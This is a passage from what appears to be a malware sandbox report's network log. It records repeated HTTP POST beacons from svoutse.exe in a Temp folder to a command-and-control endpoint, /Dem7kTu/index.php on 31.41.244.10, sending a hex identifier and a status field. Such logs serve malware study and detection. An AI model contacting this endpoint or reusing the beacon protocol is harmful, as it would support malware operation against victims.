70	192.168.2.7	49883	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:13.160228968 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:13.972117901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.7	49885	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:14.085547924 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:14.796653986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.7	49886	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:14.806576014 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:15.530692101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.7	49887	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:15.647588015 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:16.352927923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.7	49888	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:16.361964941 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:17.093388081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.7	49899	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:17.219007969 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:17.918221951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.7	49900	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:17.928949118 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.7	49901	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:18.064146996 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:18.757885933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.7	49902	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:18.770100117 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:19.489217043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.7	49903	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:19.611203909 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:20.757217884 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:20.757380962 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:20.757575035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.7	49904	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:20.767294884 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:21.487922907 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.7	49905	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:21.607204914 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:22.321192980 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.7	49906	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:22.330621004 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:23.164788961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.7	49907	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:23.280334949 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:24.155801058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.7	49908	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:24.165740013 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:24.865221977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.7	49909	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:24.984472036 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:25.698282957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.7	49910	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:25.707020044 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:26.411360025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.7	49911	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:26.539645910 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:27.242930889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.7	49912	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:27.253194094 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:27.953917980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.7	49913	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:28.066276073 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:28.795059919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.7	49914	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:28.805351019 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:29.510785103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.7	49915	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:29.626980066 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:30.321928024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.7	49916	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
